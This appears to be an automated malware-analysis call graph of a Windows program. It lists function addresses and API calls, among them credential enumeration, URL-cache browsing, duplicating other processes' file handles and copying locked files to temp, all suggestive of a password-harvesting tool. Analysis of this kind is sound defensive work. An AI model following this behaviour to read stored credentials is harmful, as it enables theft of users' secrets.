4110f7 _wcsicmp 38163->38165 38164 411157 38166 40ada2 _wcsicmp 38164->38166 38165->38160 38165->38163 38319 410c46 10 API calls 38165->38319 38169 411167 38166->38169 38167 4111af 38169->38167 38170 4111a6 qsort 38169->38170 38170->38167 38173->37970 38175 40eb10 38174->38175 38187 40e8e0 38175->38187 38178 40eb6c memcpy memcpy 38179 40ebb7 38178->38179 38179->38178 38180 40ebf2 ??2@YAPAXI ??2@YAPAXI 38179->38180 38184 40d134 16 API calls 38179->38184 38181 40ec2e ??2@YAPAXI 38180->38181 38183 40ec65 38180->38183 38181->38183 38197 40ea7f 38183->38197 38184->38179 38186 402f49 38186->37970 38188 40e8f2 38187->38188 38189 40e8eb ??3@YAXPAX 38187->38189 38190 40e900 38188->38190 38191 40e8f9 ??3@YAXPAX 38188->38191 38189->38188 38192 40e911 38190->38192 38193 40e90a ??3@YAXPAX 38190->38193 38191->38190 38194 40e931 ??2@YAPAXI ??2@YAPAXI 38192->38194 38195 40e921 ??3@YAXPAX 38192->38195 38196 40e92a ??3@YAXPAX 38192->38196 38193->38192 38194->38178 38195->38196 38196->38194 38198 40aa04 ??3@YAXPAX 38197->38198 38199 40ea88 38198->38199 38200 40aa04 ??3@YAXPAX 38199->38200 38201 40ea90 38200->38201 38202 40aa04 ??3@YAXPAX 38201->38202 38203 40ea98 38202->38203 38204 40aa04 ??3@YAXPAX 38203->38204 38205 40eaa0 38204->38205 38206 40a9ce 4 API calls 38205->38206 38207 40eab3 38206->38207 38208 40a9ce 4 API calls 38207->38208 38209 40eabd 38208->38209 38210 40a9ce 4 API calls 38209->38210 38211 40eac7 38210->38211 38212 40a9ce 4 API calls 38211->38212 38213 40ead1 38212->38213 38213->38186 38214->38146 38215->38150 38273 40b2cc 38216->38273 38218 402b0a 38219 40b2cc 27 API calls 38218->38219 38220 402b23 38219->38220 38221 40b2cc 27 API calls 38220->38221 38222 402b3a 38221->38222 38223 40b2cc 27 API calls 38222->38223 38224 402b54 38223->38224 38225 40b2cc 27 API calls 38224->38225 38226 402b6b 38225->38226 38227 40b2cc 27 API calls 38226->38227 38228 402b82 38227->38228 38229 40b2cc 27 API calls 38228->38229 38230 402b99 38229->38230 38231 40b2cc 27 API calls 38230->38231 38232 402bb0 38231->38232 38233 40b2cc 27 API calls 38232->38233 38234 402bc7 38233->38234 38235 40b2cc 27 API calls 38234->38235 38236 402bde 38235->38236 38237 40b2cc 27 API calls 38236->38237 38238 402bf5 38237->38238 38239 40b2cc 27 API calls 38238->38239 38240 402c0c 38239->38240 38241 40b2cc 27 API calls 38240->38241 38242 402c23 38241->38242 38243 40b2cc 27 API calls 38242->38243 38244 402c3a 38243->38244 38245 40b2cc 27 API calls 38244->38245 38246 402c51 38245->38246 38247 40b2cc 27 API calls 38246->38247 38248 402c68 38247->38248 38249 40b2cc 27 API calls 38248->38249 38250 402c7f 38249->38250 38251 40b2cc 27 API calls 38250->38251 38252 402c99 38251->38252 38253 40b2cc 27 API calls 38252->38253 38254 402cb3 38253->38254 38255 40b2cc 27 API calls 38254->38255 38256 402cd5 38255->38256 38257 40b2cc 27 API calls 38256->38257 38258 402cf0 38257->38258 38259 40b2cc 27 API calls 38258->38259 38260 402d0b 38259->38260 38261 40b2cc 27 API calls 38260->38261 38262 402d26 38261->38262 38263 40b2cc 27 API calls 38262->38263 38264 402d3e 38263->38264 38265 40b2cc 27 API calls 38264->38265 38266 402d59 38265->38266 38267 40b2cc 27 API calls 38266->38267 38268 402d78 38267->38268 38269 40b2cc 27 API calls 38268->38269 38270 402d93 38269->38270 38271 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38270->38271 38271->38154 38272->38144 38276 40b58d 38273->38276 38275 40b2d1 38275->38218 38277 40b5a4 GetModuleHandleW FindResourceW 38276->38277 38278 40b62e 38276->38278 38279 40b5c2 LoadResource 38277->38279 38281 40b5e7 38277->38281 38278->38275 38280 40b5d0 SizeofResource LockResource 38279->38280 38279->38281 38280->38281 38281->38278 38289 40afcf 38281->38289 38283 40b608 memcpy 38292 40b4d3 memcpy 38283->38292 38285 40b61e 38293 40b3c1 18 API calls 38285->38293 38287 40b626 38294 40b04b 38287->38294 38290 40b04b ??3@YAXPAX 38289->38290 38291 40afd7 ??2@YAPAXI 38290->38291 38291->38283 38292->38285 38293->38287 38295 40b051 ??3@YAXPAX 38294->38295 38296 40b05f 38294->38296 38295->38296 38296->38278 38297->38162 38299 4032c4 38298->38299 38300 40b633 ??3@YAXPAX 38299->38300 38301 403316 38300->38301 38320 44553b 38301->38320 38305 403480 38516 40368c 15 API calls 38305->38516 38307 403489 38308 40b633 ??3@YAXPAX 38307->38308 38309 403495 38308->38309 38309->38164 38310 4033a9 memset memcpy 38311 4033ec wcscmp 38310->38311 38312 40333c 38310->38312 38311->38312 38312->38305 38312->38310 38312->38311 38514 4028e7 11 API calls 38312->38514 38515 40f508 6 API calls 38312->38515 38314 403421 _wcsicmp 38314->38312 38317 444a64 FreeLibrary 38316->38317 38318 444a83 38316->38318 38317->38318 38318->38164 38319->38165 38321 445548 38320->38321 38322 445599 38321->38322 38517 40c768 38321->38517 38323 4455a8 memset 38322->38323 38330 4457f2 38322->38330 38600 403988 38323->38600 38334 445854 38330->38334 38702 403e2d memset memset memset memset memset 38330->38702 38331 445672 38611 403fbe memset memset memset memset memset 38331->38611 38332 4458bb memset memset 38337 414c2e 16 API calls 38332->38337 38380 4458aa 38334->38380 38725 403c9c memset memset memset memset memset 38334->38725 38335 44595e memset memset 38340 414c2e 16 API calls 38335->38340 38336 4455e5 38336->38331 38343 44560f 38336->38343 38341 4458f9 38337->38341 38339 445a00 memset memset 38748 414c2e 38339->38748 38351 44599c 38340->38351 38352 40b2cc 27 API calls 38341->38352 38355 4087b3 338 API calls 38343->38355 38344 44557a 38377 44558c 38344->38377 38797 41366b FreeLibrary 38344->38797 38345 445849 38812 40b1ab ??3@YAXPAX ??3@YAXPAX 38345->38812 38346 445bca 38353 445c8b memset memset 38346->38353 38419 445cf0 38346->38419 38347 445b38 memset memset memset 38357 445bd4 38347->38357 38358 445b98 38347->38358 38361 40b2cc 27 API calls 38351->38361 38354 445909 38352->38354 38365 414c2e 16 API calls 38353->38365 38362 409d1f 6 API calls 38354->38362 38363 445621 38355->38363 38356 44589f 38813 40b1ab ??3@YAXPAX ??3@YAXPAX 38356->38813 38371 414c2e 16 API calls 38357->38371 38358->38357 38367 445ba2 38358->38367 38364 4459ac 38361->38364 38373 445919 38362->38373 38798 4454bf 20 API calls 38363->38798 38375 409d1f 6 API calls 38364->38375 38376 445cc9 38365->38376 38885 4099c6 wcslen 38367->38885 38368 4456b2 38800 40b1ab ??3@YAXPAX ??3@YAXPAX 38368->38800 38370 40b2cc 27 API calls 38381 445a4f 38370->38381 38383 445be2 38371->38383 38372 403335 38513 4452e5 45 API calls 38372->38513 38814 409b98 GetFileAttributesW 38373->38814 38374 445823 38374->38345 38387 4087b3 338 API calls 38374->38387 38389 4459bc 38375->38389 38390 409d1f 6 API calls 38376->38390 38584 444b06 38377->38584 38378 445879 38378->38356 38400 4087b3 338 API calls 38378->38400 38380->38332 38405 44594a 38380->38405 38763 409d1f wcslen wcslen 38381->38763 38394 40b2cc 27 API calls 38383->38394 38384 445d3d 38404 40b2cc 27 API calls 38384->38404 38385 445d88 memset memset memset 38388 414c2e 16 API calls 38385->38388 38387->38374 38397 445dde 38388->38397 38881 409b98 GetFileAttributesW 38389->38881 38399 445ce1 38390->38399 38391 445bb3 38888 445403 memset 38391->38888 38392 445680 38392->38368 38634 4087b3 memset 38392->38634 38403 445bf3 38394->38403 38395 445928 38395->38405 38815 40b6ef 38395->38815 38406 40b2cc 27 API calls 38397->38406 38905 409b98 GetFileAttributesW 38399->38905 38400->38378 38412 409d1f 6 API calls 38403->38412 38414 445d54 _wcsicmp 38404->38414 38405->38335 38418 4459ed 38405->38418 38417 445def 38406->38417 38407 4459cb 38407->38418 38428 40b6ef 253 API calls 38407->38428 38411 40b2cc 27 API calls 38421 445a94 38411->38421 38413 445c07 38412->38413 38424 445389 259 API calls 38413->38424 38425 445d71 38414->38425 38491 445d67 38414->38491 38416 445665 38799 40b1ab ??3@YAXPAX ??3@YAXPAX 38416->38799 38426 409d1f 6 API calls 38417->38426 38418->38339 38461 445b22 38418->38461 38419->38372 38419->38384 38419->38385 38420 445389 259 API calls 38420->38346 38768 40ae18 38421->38768 38422 44566d 38422->38330 38685 413d4c 38422->38685 38431 445c17 38424->38431 38906 445093 23 API calls 38425->38906 38434 445e03 38426->38434 38428->38418 38430 4456d8 38435 40b2cc 27 API calls 38430->38435 38436 40b2cc 27 API calls 38431->38436 38433 44563c 38433->38416 38438 4087b3 338 API calls 38433->38438 38907 409b98 GetFileAttributesW 38434->38907 38441 4456e2 38435->38441 38442 445c23 38436->38442 38437 445d83 38437->38372 38438->38433 38440 40b6ef 253 API calls 38440->38372 38801 413fa6 _wcsicmp _wcsicmp 38441->38801 38446 409d1f 6 API calls 38442->38446 38444 445e12 38451 445e6b 38444->38451 38457 40b2cc 27 API calls 38444->38457 38449 445c37 38446->38449 38447 445aa1 38450 445b17 38447->38450 38465 445ab2 memset 38447->38465 38479 409d1f 6 API calls 38447->38479 38775 40add4 38447->38775 38780 445389 38447->38780 38789 40ae51 38447->38789 38448 4456eb 38453 4456fd memset memset memset memset 38448->38453 38454 4457ea 38448->38454 38455 445389 259 API calls 38449->38455 38882 40aebe 38450->38882 38909 445093 23 API calls 38451->38909 38802 409c70 wcscpy wcsrchr 38453->38802 38805 413d29 38454->38805 38460 445c47 38455->38460 38462 445e33 38457->38462 38467 40b2cc 27 API calls 38460->38467 38461->38346 38461->38347 38468 409d1f 6 API calls 38462->38468 38464 445e7e 38469 445f67 38464->38469 38470 40b2cc 27 API calls 38465->38470 38472 445c53 38467->38472 38473 445e47 38468->38473 38474 40b2cc 27 API calls 38469->38474 38470->38447 38471 409c70 2 API calls 38475 44577e 38471->38475 38476 409d1f 6 API calls 38472->38476 38908 409b98 GetFileAttributesW 38473->38908 38478 445f73 38474->38478 38480 409c70 2 API calls 38475->38480 38481 445c67 38476->38481 38483 409d1f 6 API calls 38478->38483 38479->38447 38484 44578d 38480->38484 38485 445389 259 API calls 38481->38485 38482 445e56 38482->38451 38488 445e83 memset 38482->38488 38486 445f87 38483->38486 38484->38454 38490 40b2cc 27 API calls 38484->38490 38485->38346 38912 409b98 GetFileAttributesW 38486->38912 38492 40b2cc 27 API calls 38488->38492 38494 4457a8 38490->38494 38491->38372 38491->38440 38493 445eab 38492->38493 38495 409d1f 6 API calls 38493->38495 38496 409d1f 6 API calls 38494->38496 38497 445ebf 38495->38497 38498 4457b8 38496->38498 38499 40ae18 9 API calls 38497->38499 38804 409b98 GetFileAttributesW 38498->38804 38509 445ef5 38499->38509 38501 4457c7 38501->38454 38503 4087b3 338 API calls 38501->38503 38502 40ae51 9 API calls 38502->38509 38503->38454 38504 445f5c 38506 40aebe FindClose 38504->38506 38505 40add4 2 API calls 38505->38509 38506->38469 38507 40b2cc 27 API calls 38507->38509 38508 409d1f 6 API calls 38508->38509 38509->38502 38509->38504 38509->38505 38509->38507 38509->38508 38511 445f3a 38509->38511 38910 409b98 GetFileAttributesW 38509->38910 38911 445093 23 API calls 38511->38911 38513->38312 38514->38314 38515->38312 38516->38307 38518 40c775 38517->38518 38913 40b1ab ??3@YAXPAX ??3@YAXPAX 38518->38913 38520 40c788 38914 40b1ab ??3@YAXPAX ??3@YAXPAX 38520->38914 38522 40c790 38915 40b1ab ??3@YAXPAX ??3@YAXPAX 38522->38915 38524 40c798 38525 40aa04 ??3@YAXPAX 38524->38525 38526 40c7a0 38525->38526 38916 40c274 memset 38526->38916 38531 40a8ab 9 API calls 38532 40c7c3 38531->38532 38533 40a8ab 9 API calls 38532->38533 38534 40c7d0 38533->38534 38945 40c3c3 38534->38945 38538 40c877 38547 40bdb0 38538->38547 38539 40c86c 38987 4053fe 39 API calls 38539->38987 38541 40c7e5 38541->38538 38541->38539 38546 40c634 50 API calls 38541->38546 38970 40a706 38541->38970 38546->38541 39155 404363 38547->39155 38550 40bf5d 39175 40440c 38550->39175 38552 40bdee 38552->38550 38555 40b2cc 27 API calls 38552->38555 38553 40bddf CredEnumerateW 38553->38552 38556 40be02 wcslen 38555->38556 38556->38550 38559 40be1e 38556->38559 38557 40be26 _wcsncoll 38557->38559 38559->38550 38559->38557 38561 40be7d memset 38559->38561 38562 40bea7 memcpy 38559->38562 38563 40bf11 wcschr 38559->38563 38564 40b2cc 27 API calls 38559->38564 38566 40bf43 LocalFree 38559->38566 39178 40bd5d 28 API calls 38559->39178 39179 404423 38559->39179 38561->38559 38561->38562 38562->38559 38562->38563 38563->38559 38565 40bef6 _wcsnicmp 38564->38565 38565->38559 38565->38563 38566->38559 38567 4135f7 39194 4135e0 38567->39194 38570 40b2cc 27 API calls 38571 41360d 38570->38571 38572 40a804 8 API calls 38571->38572 38573 413613 38572->38573 38574 41361b 38573->38574 38575 41363e 38573->38575 38576 40b273 27 API calls 38574->38576 38577 4135e0 FreeLibrary 38575->38577 38578 413625 GetProcAddress 38576->38578 38579 413643 38577->38579 38578->38575 38580 413648 38578->38580 38579->38344 38581 413658 38580->38581 38582 4135e0 FreeLibrary 38580->38582 38581->38344 38583 413666 38582->38583 38583->38344 39197 4449b9 38584->39197 38587 444c1f 38587->38322 38588 4449b9 42 API calls 38590 444b4b 38588->38590 38589 444c15 38591 4449b9 42 API calls 38589->38591 38590->38589 39218 444972 GetVersionExW 38590->39218 38591->38587 38593 444b99 memcmp 38598 444b8c 38593->38598 38594 444c0b 39222 444a85 42 API calls 38594->39222 38598->38593 38598->38594 39219 444aa5 42 API calls 38598->39219 39220 40a7a0 GetVersionExW 38598->39220 39221 444a85 42 API calls 38598->39221 38601 40399d 38600->38601 39223 403a16 38601->39223 38603 403a09 39237 40b1ab ??3@YAXPAX ??3@YAXPAX 38603->39237 38605 4039a3 38605->38603 38609 4039f4 38605->38609 39234 40a02c CreateFileW 38605->39234 38606 403a12 wcsrchr 38606->38336 38609->38603 38610 4099c6 2 API calls 38609->38610 38610->38603 38612 414c2e 16 API calls 38611->38612 38613 404048 38612->38613 38614 414c2e 16 API calls 38613->38614 38615 404056 38614->38615 38616 409d1f 6 API calls 38615->38616 38617 404073 38616->38617 38618 409d1f 6 API calls 38617->38618 38619 40408e 38618->38619 38620 409d1f 6 API calls 38619->38620 38621 4040a6 38620->38621 38622 403af5 20 API calls 38621->38622 38623 4040ba 38622->38623 38624 403af5 20 API calls 38623->38624 38625 4040cb 38624->38625 39264 40414f memset 38625->39264 38627 404140 39278 40b1ab ??3@YAXPAX ??3@YAXPAX 38627->39278 38629 4040ec memset 38632 4040e0 38629->38632 38630 404148 38630->38392 38631 4099c6 2 API calls 38631->38632 38632->38627 38632->38629 38632->38631 38633 40a8ab 9 API calls 38632->38633 38633->38632 39291 40a6e6 WideCharToMultiByte 38634->39291 38636 4087ed 39292 4095d9 memset 38636->39292 38639 408953 38639->38392 38640 408809 memset memset memset memset memset 38641 40b2cc 27 API calls 38640->38641 38642 4088a1 38641->38642 38643 409d1f 6 API calls 38642->38643 38644 4088b1 38643->38644 38645 40b2cc 27 API calls 38644->38645 38646 4088c0 38645->38646 38647 409d1f 6 API calls 38646->38647 38648 4088d0 38647->38648 38649 40b2cc 27 API calls 38648->38649 38650 4088df 38649->38650 38651 409d1f 6 API calls 38650->38651 38652 4088ef 38651->38652 38653 40b2cc 27 API calls 38652->38653 38654 4088fe 38653->38654 38655 409d1f 6 API calls 38654->38655 38656 40890e 38655->38656 38657 40b2cc 27 API calls 38656->38657 38658 40891d 38657->38658 38659 409d1f 6 API calls 38658->38659 38660 40892d 38659->38660 39311 409b98 GetFileAttributesW 38660->39311 38662 40893e 38663 408943 38662->38663 38664 408958 38662->38664 39312 407fdf 75 API calls 38663->39312 39313 409b98 GetFileAttributesW 38664->39313 38667 408964 38668 408969 38667->38668 38669 40897b 38667->38669 39314 4082c7 199 API calls 38668->39314 39315 409b98 GetFileAttributesW 38669->39315 38672 408987 38673 4089a1 38672->38673 38674 40898c 38672->38674 38686 40b633 ??3@YAXPAX 38685->38686 38687 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38686->38687 38688 413f00 Process32NextW 38687->38688 38689 413da5 OpenProcess 38688->38689 38690 413f17 CloseHandle 38688->38690 38691 413df3 memset 38689->38691 38694 413eb0 38689->38694 38690->38430 39613 413f27 38691->39613 38693 413ebf ??3@YAXPAX 38693->38694 38694->38688 38694->38693 38695 4099f4 3 API calls 38694->38695 38695->38694 38697 413e37 GetModuleHandleW 38698 413e1f 38697->38698 38699 413e46 GetProcAddress 38697->38699 38698->38697 39618 413959 38698->39618 39634 413ca4 38698->39634 38699->38698 38701 413ea2 CloseHandle 38701->38694 38703 414c2e 16 API calls 38702->38703 38704 403eb7 38703->38704 38705 414c2e 16 API calls 38704->38705 38706 403ec5 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403ee2 38707->38708 38709 409d1f 6 API calls 38708->38709 38710 403efd 38709->38710 38711 409d1f 6 API calls 38710->38711 38712 403f15 38711->38712 38713 403af5 20 API calls 38712->38713 38714 403f29 38713->38714 38715 403af5 20 API calls 38714->38715 38716 403f3a 38715->38716 38717 40414f 33 API calls 38716->38717 38718 403f4f 38717->38718 38719 403faf 38718->38719 38721 403f5b memset 38718->38721 38723 4099c6 2 API calls 38718->38723 38724 40a8ab 9 API calls 38718->38724 39648 40b1ab ??3@YAXPAX ??3@YAXPAX 38719->39648 38721->38718 38722 403fb7 38722->38374 38723->38718 38724->38718 38726 414c2e 16 API calls 38725->38726 38727 403d26 38726->38727 38728 414c2e 16 API calls 38727->38728 38729 403d34 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d51 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 403d6c 38732->38733 38734 409d1f 6 API calls 38733->38734 38735 403d84 38734->38735 38736 403af5 20 API calls 38735->38736 38737 403d98 38736->38737 38738 403af5 20 API calls 38737->38738 38739 403da9 38738->38739 38740 40414f 33 API calls 38739->38740 38744 403dbe 38740->38744 38741 403e1e 39649 40b1ab ??3@YAXPAX ??3@YAXPAX 38741->39649 38742 403dca memset 38742->38744 38744->38741 38744->38742 38746 4099c6 2 API calls 38744->38746 38747 40a8ab 9 API calls 38744->38747 38745 403e26 38745->38378 38746->38744 38747->38744 38749 414b81 9 API calls 38748->38749 38750 414c40 38749->38750 38751 414c73 memset 38750->38751 39650 409cea 38750->39650 38752 414c94 38751->38752 39653 414592 RegOpenKeyExW 38752->39653 38756 414c64 38756->38370 38757 414cc1 38758 414cf4 wcscpy 38757->38758 39654 414bb0 wcscpy 38757->39654 38758->38756 38760 414cd2 39655 4145ac RegQueryValueExW 38760->39655 38762 414ce9 RegCloseKey 38762->38758 38764 409d62 38763->38764 38765 409d43 wcscpy 38763->38765 38764->38411 38766 409719 2 API calls 38765->38766 38767 409d51 wcscat 38766->38767 38767->38764 38769 40aebe FindClose 38768->38769 38770 40ae21 38769->38770 38771 4099c6 2 API calls 38770->38771 38772 40ae35 38771->38772 38773 409d1f 6 API calls 38772->38773 38774 40ae49 38773->38774 38774->38447 38776 40ade0 38775->38776 38777 40ae0f 38775->38777 38776->38777 38778 40ade7 wcscmp 38776->38778 38777->38447 38778->38777 38779 40adfe wcscmp 38778->38779 38779->38777 38781 40ae18 9 API calls 38780->38781 38787 4453c4 38781->38787 38782 40ae51 9 API calls 38782->38787 38783 4453f3 38785 40aebe FindClose 38783->38785 38784 40add4 2 API calls 38784->38787 38786 4453fe 38785->38786 38786->38447 38787->38782 38787->38783 38787->38784 38788 445403 254 API calls 38787->38788 38788->38787 38790 40ae7b FindNextFileW 38789->38790 38791 40ae5c FindFirstFileW 38789->38791 38792 40ae94 38790->38792 38793 40ae8f 38790->38793 38791->38792 38795 40aeb6 38792->38795 38796 409d1f 6 API calls 38792->38796 38794 40aebe FindClose 38793->38794 38794->38792 38795->38447 38796->38795 38797->38377 38798->38433 38799->38422 38800->38422 38801->38448 38803 409c89 38802->38803 38803->38471 38804->38501 38806 413d39 38805->38806 38807 413d2f FreeLibrary 38805->38807 38808 40b633 ??3@YAXPAX 38806->38808 38807->38806 38809 413d42 38808->38809 38810 40b633 ??3@YAXPAX 38809->38810 38811 413d4a 38810->38811 38811->38330 38812->38334 38813->38380 38814->38395 38816 44db70 38815->38816 38817 40b6fc memset 38816->38817 38818 409c70 2 API calls 38817->38818 38819 40b732 wcsrchr 38818->38819 38820 40b743 38819->38820 38821 40b746 memset 38819->38821 38820->38821 38822 40b2cc 27 API calls 38821->38822 38823 40b76f 38822->38823 38824 409d1f 6 API calls 38823->38824 38825 40b783 38824->38825 39656 409b98 GetFileAttributesW 38825->39656 38827 40b792 38828 40b7c2 38827->38828 38829 409c70 2 API calls 38827->38829 39657 40bb98 38828->39657 38831 40b7a5 38829->38831 38833 40b2cc 27 API calls 38831->38833 38836 40b7b2 38833->38836 38834 40b837 FindCloseChangeNotification 38838 40b83e memset 38834->38838 38835 40b817 39691 409a45 GetTempPathW 38835->39691 38839 409d1f 6 API calls 38836->38839 39690 40a6e6 WideCharToMultiByte 38838->39690 38839->38828 38840 40b827 CopyFileW 38840->38838 38842 40b866 38843 444432 121 API calls 38842->38843 38844 40b879 38843->38844 38845 40bad5 38844->38845 38846 40b273 27 API calls 38844->38846 38847 40baeb 38845->38847 38848 40bade DeleteFileW 38845->38848 38849 40b89a 38846->38849 38850 40b04b ??3@YAXPAX 38847->38850 38848->38847 38851 438552 134 API calls 38849->38851 38852 40baf3 38850->38852 38853 40b8a4 38851->38853 38852->38405 38854 40bacd 38853->38854 38856 4251c4 137 API calls 38853->38856 38855 443d90 111 API calls 38854->38855 38855->38845 38878 40b8b8 38856->38878 38857 40bac6 39703 424f26 123 API calls 38857->39703 38858 40b8bd memset 39694 425413 17 API calls 38858->39694 38861 425413 17 API calls 38861->38878 38864 40a71b MultiByteToWideChar 38864->38878 38867 40b9b5 memcmp 38867->38878 38868 4099c6 2 API calls 38868->38878 38869 404423 38 API calls 38869->38878 38872 40bb3e memset memcpy 39704 40a734 MultiByteToWideChar 38872->39704 38873 4251c4 137 API calls 38873->38878 38875 40bb88 LocalFree 38875->38878 38878->38857 38878->38858 38878->38861 38878->38864 38878->38867 38878->38868 38878->38869 38878->38872 38878->38873 38879 40ba5f memcmp 38878->38879 38880 40a734 MultiByteToWideChar 38878->38880 39695 4253ef 16 API calls 38878->39695 39696 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38878->39696 39697 4253af 17 API calls 38878->39697 39698 4253cf 17 API calls 38878->39698 39699 447280 memset 38878->39699 39700 447960 memset memcpy memcpy memcpy 38878->39700 39701 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38878->39701 39702 447920 memcpy memcpy memcpy 38878->39702 38879->38878 38880->38878 38881->38407 38883 40aed1 38882->38883 38884 40aec7 FindClose 38882->38884 38883->38461 38884->38883 38886 4099d7 38885->38886 38887 4099da memcpy 38885->38887 38886->38887 38887->38391 38889 40b2cc 27 API calls 38888->38889 38890 44543f 38889->38890 38891 409d1f 6 API calls 38890->38891 38892 44544f 38891->38892 39791 409b98 GetFileAttributesW 38892->39791 38894 44545e 38895 445476 38894->38895 38896 40b6ef 253 API calls 38894->38896 38897 40b2cc 27 API calls 38895->38897 38896->38895 38898 445482 38897->38898 38899 409d1f 6 API calls 38898->38899 38900 445492 38899->38900 39792 409b98 GetFileAttributesW 38900->39792 38902 4454a1 38903 4454b9 38902->38903 38904 40b6ef 253 API calls 38902->38904 38903->38420 38904->38903 38905->38419 38906->38437 38907->38444 38908->38482 38909->38464 38910->38509 38911->38509 38912->38491 38913->38520 38914->38522 38915->38524 38917 414c2e 16 API calls 38916->38917 38918 40c2ae 38917->38918 38988 40c1d3 38918->38988 38923 40c3be 38940 40a8ab 38923->38940 38924 40afcf 2 API calls 38925 40c2fd FindFirstUrlCacheEntryW 38924->38925 38926 40c3b6 38925->38926 38927 40c31e wcschr 38925->38927 38928 40b04b ??3@YAXPAX 38926->38928 38929 40c331 38927->38929 38930 40c35e FindNextUrlCacheEntryW 38927->38930 38928->38923 38931 40a8ab 9 API calls 38929->38931 38930->38927 38932 40c373 GetLastError 38930->38932 38935 40c33e wcschr 38931->38935 38933 40c3ad FindCloseUrlCache 38932->38933 38934 40c37e 38932->38934 38933->38926 38936 40afcf 2 API calls 38934->38936 38935->38930 38937 40c34f 38935->38937 38938 40c391 FindNextUrlCacheEntryW 38936->38938 38939 40a8ab 9 API calls 38937->38939 38938->38927 38938->38933 38939->38930 39082 40a97a 38940->39082 38943 40a8cc 38943->38531 38944 40a8d0 7 API calls 38944->38943 39087 40b1ab ??3@YAXPAX ??3@YAXPAX 38945->39087 38947 40c3dd 38948 40b2cc 27 API calls 38947->38948 38949 40c3e7 38948->38949 39088 414592 RegOpenKeyExW 38949->39088 38951 40c3f4 38952 40c50e 38951->38952 38953 40c3ff 38951->38953 38967 405337 38952->38967 38954 40a9ce 4 API calls 38953->38954 38955 40c418 memset 38954->38955 39089 40aa1d 38955->39089 38958 40c471 38960 40c47a _wcsupr 38958->38960 38959 40c505 RegCloseKey 38959->38952 38961 40a8d0 7 API calls 38960->38961 38962 40c498 38961->38962 38963 40a8d0 7 API calls 38962->38963 38964 40c4ac memset 38963->38964 38965 40aa1d 38964->38965 38966 40c4e4 RegEnumValueW 38965->38966 38966->38959 38966->38960 39091 405220 38967->39091 38971 4099c6 2 API calls 38970->38971 38972 40a714 _wcslwr 38971->38972 38973 40c634 38972->38973 39148 405361 38973->39148 38976 40c65c wcslen 39151 4053b6 39 API calls 38976->39151 38977 40c71d wcslen 38977->38541 38979 40c713 39154 4053df 39 API calls 38979->39154 38980 40c677 38980->38979 39152 40538b 39 API calls 38980->39152 38983 40c6a5 38983->38979 38984 40c6a9 memset 38983->38984 38985 40c6d3 38984->38985 39153 40c589 44 API calls 38985->39153 38987->38538 38989 40ae18 9 API calls 38988->38989 38995 40c210 38989->38995 38990 40ae51 9 API calls 38990->38995 38991 40c264 38992 40aebe FindClose 38991->38992 38994 40c26f 38992->38994 38993 40add4 2 API calls 38993->38995 39000 40e5ed memset memset 38994->39000 38995->38990 38995->38991 38995->38993 38996 40c231 _wcsicmp 38995->38996 38997 40c1d3 35 API calls 38995->38997 38996->38995 38998 40c248 38996->38998 38997->38995 39013 40c084 22 API calls 38998->39013 39001 414c2e 16 API calls 39000->39001 39002 40e63f 39001->39002 39003 409d1f 6 API calls 39002->39003 39004 40e658 39003->39004 39014 409b98 GetFileAttributesW 39004->39014 39006 40e667 39007 40e680 39006->39007 39009 409d1f 6 API calls 39006->39009 39015 409b98 GetFileAttributesW 39007->39015 39009->39007 39010 40e68f 39011 40c2d8 39010->39011 39016 40e4b2 39010->39016 39011->38923 39011->38924 39013->38995 39014->39006 39015->39010 39037 40e01e 39016->39037 39018 40e593 39019 40e5b0 39018->39019 39020 40e59c DeleteFileW 39018->39020 39022 40b04b ??3@YAXPAX 39019->39022 39020->39019 39021 40e521 39021->39018 39060 40e175 39021->39060 39023 40e5bb 39022->39023 39025 40e5c4 CloseHandle 39023->39025 39026 40e5cc 39023->39026 39025->39026 39028 40b633 ??3@YAXPAX 39026->39028 39027 40e573 39030 40e584 39027->39030 39031 40e57c FindCloseChangeNotification 39027->39031 39029 40e5db 39028->39029 39034 40b633 ??3@YAXPAX 39029->39034 39081 40b1ab ??3@YAXPAX ??3@YAXPAX 39030->39081 39031->39030 39033 40e540 39033->39027 39080 40e2ab 30 API calls 39033->39080 39035 40e5e3 39034->39035 39035->39011 39038 406214 22 API calls 39037->39038 39039 40e03c 39038->39039 39040 40e16b 39039->39040 39041 40dd85 74 API calls 39039->39041 39040->39021 39042 40e06b 39041->39042 39042->39040 39043 40afcf ??2@YAPAXI ??3@YAXPAX 39042->39043 39044 40e08d OpenProcess 39043->39044 39045 40e0a4 GetCurrentProcess DuplicateHandle 39044->39045 39049 40e152 39044->39049 39046 40e0d0 GetFileSize 39045->39046 39047 40e14a CloseHandle 39045->39047 39050 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39046->39050 39047->39049 39048 40e160 39052 40b04b ??3@YAXPAX 39048->39052 39049->39048 39051 406214 22 API calls 39049->39051 39053 40e0ea 39050->39053 39051->39048 39052->39040 39054 4096dc CreateFileW 39053->39054 39055 40e0f1 CreateFileMappingW 39054->39055 39056 40e140 CloseHandle CloseHandle 39055->39056 39057 40e10b MapViewOfFile 39055->39057 39056->39047 39058 40e13b FindCloseChangeNotification 39057->39058 39059 40e11f WriteFile UnmapViewOfFile 39057->39059 39058->39056 39059->39058 39061 40e18c 39060->39061 39062 406b90 11 API calls 39061->39062 39063 40e19f 39062->39063 39064 40e1a7 memset 39063->39064 39065 40e299 39063->39065 39070 40e1e8 39064->39070 39066 4069a3 ??3@YAXPAX ??3@YAXPAX 39065->39066 39067 40e2a4 39066->39067 39067->39033 39068 406e8f 13 API calls 39068->39070 39069 406b53 SetFilePointerEx ReadFile 39069->39070 39070->39068 39070->39069 39071 40e283 39070->39071 39072 40dd50 _wcsicmp 39070->39072 39076 40742e 8 API calls 39070->39076 39077 40aae3 wcslen wcslen _memicmp 39070->39077 39078 40e244 _snwprintf 39070->39078 39073 40e291 39071->39073 39074 40e288 ??3@YAXPAX 39071->39074 39072->39070 39075 40aa04 ??3@YAXPAX 39073->39075 39074->39073 39075->39065 39076->39070 39077->39070 39079 40a8d0 7 API calls 39078->39079 39079->39070 39080->39033 39081->39018 39083 40a980 39082->39083 39084 40a8bb 39083->39084 39085 40a995 _wcsicmp 39083->39085 39086 40a99c wcscmp 39083->39086 39084->38943 